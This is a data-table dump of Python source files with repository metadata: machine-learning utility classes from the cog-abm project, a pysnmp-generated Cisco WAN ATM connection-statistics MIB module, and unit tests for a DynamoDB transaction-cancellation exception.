hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d2efc70efd70e2b9c96aa0a04ce151c8c6316974 | 6,286 | py | Python | src/cog_abm/ML/core.py | 4dnucleome/cog-abm | 6f6450141a996b067d3a396d47f4386215a4042c | [
"BSD-3-Clause"
] | 1 | 2015-09-27T18:39:11.000Z | 2015-09-27T18:39:11.000Z | src/cog_abm/ML/core.py | 4dnucleome/cog-abm | 6f6450141a996b067d3a396d47f4386215a4042c | [
"BSD-3-Clause"
] | null | null | null | src/cog_abm/ML/core.py | 4dnucleome/cog-abm | 6f6450141a996b067d3a396d47f4386215a4042c | [
"BSD-3-Clause"
] | null | null | null | """
Commonly used machine-learning utilities
"""
import math
from itertools import izip
from random import shuffle
from scipy.io.arff import loadarff
from cog_abm.extras.tools import flatten
class Classifier(object):
    def classify(self, sample):
        """
        Returns the predicted class of the sample
        """
        pass
def classify_pval(self, sample):
"""
Returns tuple with class and probability of sample belonging to it
"""
pass
def class_probabilities(self, sample):
"""
Returns dict with mapping class->probability that sample belongs to it
"""
pass
def train(self, samples):
pass
def clone(self):
"""
Returns copy of classifier. This is default implementation.
Should be overriden in subclasses.
@rtype: Classifier
@return: New instance of classifier.
"""
import copy
return copy.deepcopy(self)
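The default `clone` above relies on `copy.deepcopy`, so any mutable trained state is duplicated rather than shared between the original and the clone. A minimal sketch with a hypothetical toy classifier (not part of the module above):

```python
import copy

class ToyClassifier:
    """Hypothetical stand-in with mutable trained state."""
    def __init__(self):
        self.weights = [0.0]

    def train(self, samples):
        # accumulate something mutable so sharing would be visible
        self.weights[0] += len(samples)

    def clone(self):
        # same default as Classifier.clone above
        return copy.deepcopy(self)

a = ToyClassifier()
b = a.clone()
a.train([1, 2, 3])
print(a.weights, b.weights)  # [3.0] [0.0]
```

Training the original after cloning leaves the clone's state untouched, which is exactly what a shallow copy would not guarantee.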
class Attribute(object):
ID = None
""" This class field is for id when putting some conversion method in dict
"""
    def get_value(self, value):
        ''' Converts *value* from the inner (stored) representation
        to the outer one.
        '''
        pass
    def set_value(self, value):
        ''' Converts *value* from the outer representation
        to the inner (stored) one.
        '''
        return value
def __eq__(self, other):
return self.ID == other.ID
class NumericAttribute(Attribute):
ID = "NumericAttribute"
def get_value(self, value):
return value
class NominalAttribute(Attribute):
ID = "NominalAttribute"
def __init__(self, symbols):
"""
Symbols should be strings!
For example Orange doesn't support any other format
"""
        symbols = [str(s) for s in symbols]
        self.symbols = tuple(symbols)
        self.mapping = dict((s, i) for i, s in enumerate(self.symbols))
        self.tmp_rng = set(xrange(len(self.symbols)))
def get_symbol(self, idx):
return self.symbols[idx]
def get_idx(self, symbol):
return self.mapping[str(symbol)]
def get_value(self, value):
return self.get_symbol(value)
def set_value(self, value):
return self.set_symbol(value)
def set_symbol(self, symbol):
return self.get_idx(symbol)
def __eq__(self, other):
return super(NominalAttribute, self).__eq__(other) and \
set(self.symbols) == set(other.symbols)
class Sample(object):
def __init__(self, values, meta=None, cls=None, cls_meta=None,
dist_fun=None, last_is_class=False, cls_idx=None):
self.values = values[:]
self.meta = meta or [NumericAttribute() for _ in values]
if last_is_class or cls_idx is not None:
if last_is_class:
cls_idx = -1
self.cls_meta = self.meta[cls_idx]
self.cls = self.values[cls_idx]
self.meta = self.meta[:]
del self.values[cls_idx], self.meta[cls_idx]
else:
self.cls = cls
self.cls_meta = cls_meta
if dist_fun is None and \
all(attr.ID == NumericAttribute.ID for attr in self.meta):
self.dist_fun = euclidean_distance
else:
self.dist_fun = dist_fun
def get_cls(self):
if self.cls_meta is None or self.cls is None:
return None
return self.cls_meta.get_value(self.cls)
def get_values(self):
return [m.get_value(v) for v, m in izip(self.values, self.meta)]
def distance(self, other):
return self.dist_fun(self, other)
def __eq__(self, other):
return self.cls == other.cls and self.cls_meta == other.cls_meta and \
self.meta == other.meta and self.values == other.values
def __hash__(self):
return 3 * hash(tuple(self.values)) + 5 * hash(self.cls)
def __str__(self):
return "({0}, {1})".format(str(self.get_values()), self.get_cls())
def __repr__(self):
return str(self)
def copy_basic(self):
return Sample(self.values, self.meta, dist_fun=self.dist_fun)
def copy_full(self):
return Sample(self.values, self.meta, self.cls, self.cls_meta,
self.dist_fun)
def copy_set_cls(self, cls, meta):
s = self.copy_basic()
s.cls_meta = meta
s.cls = meta.set_value(cls)
return s
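The constructor's `last_is_class`/`cls_idx` handling above peels the class column off the value and meta lists with the same index. The index arithmetic can be sketched on plain lists (an illustrative helper, not the `Sample` class itself):

```python
def split_class_column(values, last_is_class=False, cls_idx=None):
    """Return (features, cls) after removing the class column,
    mirroring Sample.__init__'s index handling."""
    values = list(values)  # avoid mutating the caller's list
    if last_is_class:
        cls_idx = -1
    if cls_idx is None:
        # no class column configured at all
        return values, None
    cls = values[cls_idx]
    del values[cls_idx]
    return values, cls

print(split_class_column([1.0, 2.0, 'A'], last_is_class=True))
# ([1.0, 2.0], 'A')
```

`Sample.__init__` applies the same deletion to both `self.values` and `self.meta`, keeping the feature values aligned with their attribute descriptors.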
#Sample distance functions
def euclidean_distance(sx, sy):
return math.sqrt(math.fsum([
(x - y) * (x - y) for x, y in izip(sx.get_values(), sy.get_values())
]))
def load_samples_arff(file_name, last_is_class=False, look_for_cls=True):
a_data, a_meta = loadarff(file_name)
names = a_meta.names()
attr = {"nominal": lambda attrs: NominalAttribute(attrs),
"numeric": lambda _: NumericAttribute()}
gen = (a_meta[n] for n in names)
meta = [attr[a[0]](a[1]) for a in gen]
cls_idx = None
if look_for_cls:
for i, name in enumerate(names):
if a_meta[name][0] == "nominal" and name.lower() == "class":
cls_idx = i
break
def create_sample(s):
values = [mi.set_value(vi) for mi, vi in izip(meta, s)]
return \
Sample(values, meta, last_is_class=last_is_class, cls_idx=cls_idx)
return [create_sample(s) for s in a_data]
def split_data(data, train_ratio=2. / 3.):
""" data - samples to split into two sets: train and test
train_ratio - real number in [0,1]
returns (train, test) - pair of data sets
"""
tmp = [s for s in data]
shuffle(tmp)
train = [s for i, s in enumerate(tmp) if i < train_ratio * len(tmp)]
test = [s for i, s in enumerate(tmp) if i >= train_ratio * len(tmp)]
return (train, test)
def split_data_cv(data, folds=8):
""" data - samples to split into two sets *folds* times
returns [(train, test), ...] - list of pairs of data sets
"""
tmp = [s for s in data]
shuffle(tmp)
    N = len(tmp)
    M = N / folds  # base fold size (integer division under Python 2)
    overflow = N % folds
splits = []
i = 0
while i < N:
n = M
if overflow > 0:
overflow -= 1
n += 1
split = tmp[i:i + n]
splits.append(split)
i += n
return [(flatten(splits[:i] + splits[i + 1:]), splits[i])
for i in xrange(folds)]
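The fold-splitting logic above is Python 2 (`izip`, `xrange`, integer `/`). As an illustration only, the same behaviour can be written as a standalone Python 3 sketch; this is a re-implementation for clarity, not the original module:

```python
from itertools import chain
from random import shuffle

def split_data_cv(data, folds=8):
    """Shuffle *data* and return `folds` (train, test) pairs.

    The first `len(data) % folds` folds get one extra sample,
    mirroring the overflow handling in the original code.
    """
    tmp = list(data)
    shuffle(tmp)
    base, overflow = divmod(len(tmp), folds)
    splits, i = [], 0
    for k in range(folds):
        size = base + (1 if k < overflow else 0)
        splits.append(tmp[i:i + size])
        i += size
    # each fold is the test set once; the rest form the train set
    return [(list(chain.from_iterable(splits[:k] + splits[k + 1:])), splits[k])
            for k in range(folds)]

train, test = split_data_cv(list(range(10)), folds=3)[0]
print(len(train), len(test))  # 6 4
```

With 10 samples and 3 folds, `divmod` gives fold sizes 4, 3, 3, so every sample appears in exactly one test fold.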
| 26.411765 | 78 | 0.592428 | 867 | 6,286 | 4.139562 | 0.202999 | 0.027306 | 0.021454 | 0.009752 | 0.176651 | 0.127055 | 0.075787 | 0.04068 | 0.04068 | 0.04068 | 0 | 0.004085 | 0.299077 | 6,286 | 237 | 79 | 26.523207 | 0.810486 | 0.11979 | 0 | 0.147887 | 0 | 0 | 0.012896 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.225352 | false | 0.035211 | 0.042254 | 0.119718 | 0.507042 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
d2f80279a37490706e441c30f354e3e695ef55d7 | 8,122 | py | Python | pysnmp/CISCO-WAN-BBIF-ATM-CONN-STAT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/CISCO-WAN-BBIF-ATM-CONN-STAT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/CISCO-WAN-BBIF-ATM-CONN-STAT-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module CISCO-WAN-BBIF-ATM-CONN-STAT-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-WAN-BBIF-ATM-CONN-STAT-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 18:03:57 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion")
bbChanCntGrp, = mibBuilder.importSymbols("BASIS-MIB", "bbChanCntGrp")
ciscoWan, = mibBuilder.importSymbols("CISCOWAN-SMI", "ciscoWan")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
MibIdentifier, Counter64, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, Counter32, NotificationType, Unsigned32, TimeTicks, Gauge32, ObjectIdentity, Bits, ModuleIdentity, Integer32 = mibBuilder.importSymbols("SNMPv2-SMI", "MibIdentifier", "Counter64", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "Counter32", "NotificationType", "Unsigned32", "TimeTicks", "Gauge32", "ObjectIdentity", "Bits", "ModuleIdentity", "Integer32")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
ciscoWanBbifAtmConnStatMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 351, 150, 36))
ciscoWanBbifAtmConnStatMIB.setRevisions(('2002-10-18 00:00',))
if mibBuilder.loadTexts: ciscoWanBbifAtmConnStatMIB.setLastUpdated('200210180000Z')
if mibBuilder.loadTexts: ciscoWanBbifAtmConnStatMIB.setOrganization('Cisco Systems, Inc.')
bbChanCntGrpTable = MibTable((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1), )
if mibBuilder.loadTexts: bbChanCntGrpTable.setStatus('current')
bbChanCntGrpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1), ).setIndexNames((0, "CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanCntNum"))
if mibBuilder.loadTexts: bbChanCntGrpEntry.setStatus('current')
bbChanCntNum = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(16, 4111))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanCntNum.setStatus('current')
bbChanRcvClp0Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanRcvClp0Cells.setStatus('current')
bbChanRcvClp1Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanRcvClp1Cells.setStatus('current')
bbChanNonConformCellsAtGcra1Policer = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanNonConformCellsAtGcra1Policer.setStatus('current')
bbChanNonConformCellsAtGcra2Policer = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 5), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanNonConformCellsAtGcra2Policer.setStatus('current')
bbChanRcvEOFCells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 6), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanRcvEOFCells.setStatus('current')
bbChanDscdClp0Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 7), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanDscdClp0Cells.setStatus('current')
bbChanDscdClp1Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 8), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanDscdClp1Cells.setStatus('current')
bbChanRcvCellsSent = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 9), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanRcvCellsSent.setStatus('current')
bbChanXmtClp0Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 10), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanXmtClp0Cells.setStatus('current')
bbChanXmtClp1Cells = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 11), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanXmtClp1Cells.setStatus('current')
bbChanDscdClpZeroCellsToPort = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 12), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanDscdClpZeroCellsToPort.setStatus('current')
bbChanDscdClpOneCellsToPort = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 13), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: bbChanDscdClpOneCellsToPort.setStatus('current')
bbChanCntClrButton = MibTableColumn((1, 3, 6, 1, 4, 1, 351, 110, 5, 2, 7, 3, 1, 1, 14), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("noAction", 1), ("resetCounters", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bbChanCntClrButton.setStatus('current')
cwbAtmConnStatMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 36, 2))
cwbAtmConnStatMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 36, 2, 1))
cwbAtmConnStatMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 351, 150, 36, 2, 2))
cwbAtmConnStatCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 351, 150, 36, 2, 2, 1)).setObjects(("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "cwbAtmConnStatsGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cwbAtmConnStatCompliance = cwbAtmConnStatCompliance.setStatus('current')
cwbAtmConnStatsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 351, 150, 36, 2, 1, 1)).setObjects(("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanCntNum"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanRcvClp0Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanRcvClp1Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanNonConformCellsAtGcra1Policer"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanNonConformCellsAtGcra2Policer"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanRcvEOFCells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanDscdClp0Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanDscdClp1Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanRcvCellsSent"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanXmtClp0Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanXmtClp1Cells"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanDscdClpZeroCellsToPort"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanDscdClpOneCellsToPort"), ("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", "bbChanCntClrButton"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
cwbAtmConnStatsGroup = cwbAtmConnStatsGroup.setStatus('current')
mibBuilder.exportSymbols("CISCO-WAN-BBIF-ATM-CONN-STAT-MIB", bbChanRcvCellsSent=bbChanRcvCellsSent, bbChanRcvClp1Cells=bbChanRcvClp1Cells, bbChanDscdClp0Cells=bbChanDscdClp0Cells, PYSNMP_MODULE_ID=ciscoWanBbifAtmConnStatMIB, bbChanDscdClpOneCellsToPort=bbChanDscdClpOneCellsToPort, bbChanNonConformCellsAtGcra1Policer=bbChanNonConformCellsAtGcra1Policer, cwbAtmConnStatMIBCompliances=cwbAtmConnStatMIBCompliances, bbChanXmtClp1Cells=bbChanXmtClp1Cells, cwbAtmConnStatMIBGroups=cwbAtmConnStatMIBGroups, bbChanRcvEOFCells=bbChanRcvEOFCells, bbChanRcvClp0Cells=bbChanRcvClp0Cells, cwbAtmConnStatsGroup=cwbAtmConnStatsGroup, cwbAtmConnStatMIBConformance=cwbAtmConnStatMIBConformance, bbChanCntClrButton=bbChanCntClrButton, bbChanXmtClp0Cells=bbChanXmtClp0Cells, bbChanCntNum=bbChanCntNum, bbChanDscdClpZeroCellsToPort=bbChanDscdClpZeroCellsToPort, bbChanDscdClp1Cells=bbChanDscdClp1Cells, bbChanCntGrpTable=bbChanCntGrpTable, ciscoWanBbifAtmConnStatMIB=ciscoWanBbifAtmConnStatMIB, bbChanCntGrpEntry=bbChanCntGrpEntry, cwbAtmConnStatCompliance=cwbAtmConnStatCompliance, bbChanNonConformCellsAtGcra2Policer=bbChanNonConformCellsAtGcra2Policer)
| 128.920635 | 1,137 | 0.767914 | 910 | 8,122 | 6.851648 | 0.172527 | 0.007378 | 0.010585 | 0.014114 | 0.389735 | 0.351403 | 0.255172 | 0.196792 | 0.174659 | 0.160545 | 0 | 0.078188 | 0.078798 | 8,122 | 62 | 1,138 | 131 | 0.755146 | 0.044078 | 0 | 0.037037 | 0 | 0 | 0.217924 | 0.091941 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.148148 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d2fa0a74ae8af642c87a16ed10cf79ecc3f88ff9 | 3,263 | py | Python | tests/unit/exceptions/transaction_test.py | cdominguezg/dokklib-db-extended | 8e20bb76b5727d13fdd806b1d8ea1d49362ed3c7 | [
"Apache-2.0"
] | null | null | null | tests/unit/exceptions/transaction_test.py | cdominguezg/dokklib-db-extended | 8e20bb76b5727d13fdd806b1d8ea1d49362ed3c7 | [
"Apache-2.0"
] | null | null | null | tests/unit/exceptions/transaction_test.py | cdominguezg/dokklib-db-extended | 8e20bb76b5727d13fdd806b1d8ea1d49362ed3c7 | [
"Apache-2.0"
] | null | null | null | import dokklib_db_extended as db
from dokklib_db_extended.errors.transaction import TransactionCanceledException
from tests.unit import TestBase
class TestTransactionCanceledException(TestBase):
_op_name = 'TransactWriteItems'
def _get_error(self, msg):
return {
'Error': {
'Message': msg,
'Code': 'TransactionCanceledException'
}
}
def test_empty_message(self):
error = self._get_error('')
e = TransactionCanceledException([], '', error, self._op_name)
self.assertListEqual(e.reasons, [])
def test_mismatch(self):
error = self._get_error('')
e = TransactionCanceledException(['1'], '', error, self._op_name)
with self.assertRaises(ValueError):
e.reasons
def test_one_reason(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed]'
error = self._get_error(msg)
e = TransactionCanceledException(['1'], '', error, self._op_name)
exp = [db.errors.ConditionalCheckFailedException]
self.assertListEqual(e.reasons, exp)
def test_two_reasons(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed, None]'
error = self._get_error(msg)
e = TransactionCanceledException(['oparg1', 'oparg2'],
'',
error,
self._op_name)
exp = [db.errors.ConditionalCheckFailedException, None]
self.assertListEqual(e.reasons, exp)
def test_no_space_reasons(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed,None]'
error = self._get_error(msg)
e = TransactionCanceledException(['oparg1', 'oparg2'],
'',
error,
self._op_name)
exp = [db.errors.ConditionalCheckFailedException, None]
self.assertListEqual(e.reasons, exp)
def test_has_error(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed, None]'
error = self._get_error(msg)
e = TransactionCanceledException(['oparg1', 'oparg2'],
'',
error,
self._op_name)
self.assertTrue(e.has_error(db.errors.ConditionalCheckFailedException))
def test_has_no_error(self):
msg = 'Transaction cancelled, please refer cancellation reasons for ' \
'specific reasons [ConditionalCheckFailed, None]'
error = self._get_error(msg)
e = TransactionCanceledException(['oparg1', 'oparg2'],
'',
error,
self._op_name)
self.assertFalse(e.has_error(db.errors.ValidationError))
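The behaviour exercised by these tests, mapping the bracketed cancellation-reason list in the DynamoDB error message back onto the transaction's operations, can be sketched independently of the library. This is a hypothetical helper illustrating the parsing, not the `dokklib_db_extended` implementation:

```python
import re

def parse_cancellation_reasons(message, num_ops):
    """Extract per-operation reason codes from a
    TransactionCanceledException message such as
    '... [ConditionalCheckFailed, None]'."""
    match = re.search(r'\[([^\]]*)\]', message)
    if match and match.group(1):
        reasons = [r.strip() for r in match.group(1).split(',')]
    else:
        reasons = []
    if len(reasons) != num_ops:
        # mirrors the mismatch case tested above
        raise ValueError('reason count does not match operation count')
    return [None if r == 'None' else r for r in reasons]

msg = ('Transaction cancelled, please refer cancellation reasons for '
       'specific reasons [ConditionalCheckFailed, None]')
print(parse_cancellation_reasons(msg, 2))
# ['ConditionalCheckFailed', None]
```

Stripping whitespace after the split is what makes both `[..., None]` and the no-space `[...,None]` variants parse identically, as `test_no_space_reasons` asserts.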
| 41.833333 | 79 | 0.563285 | 271 | 3,263 | 6.586716 | 0.206642 | 0.085714 | 0.047059 | 0.066667 | 0.737255 | 0.707563 | 0.707563 | 0.593838 | 0.561905 | 0.561905 | 0 | 0.004695 | 0.347226 | 3,263 | 77 | 80 | 42.376623 | 0.833333 | 0 | 0 | 0.590909 | 0 | 0 | 0.197671 | 0.046889 | 0 | 0 | 0 | 0 | 0.106061 | 1 | 0.121212 | false | 0 | 0.045455 | 0.015152 | 0.212121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
d2fb82c17a398f07961305c91ab7b78c1bb422df | 475 | py | Python | exercises/ex39-pre.py | jinkyukim-me/StudyPython | 6c98598c23c506101882392645fbb14d4aa998d4 | [
"MIT"
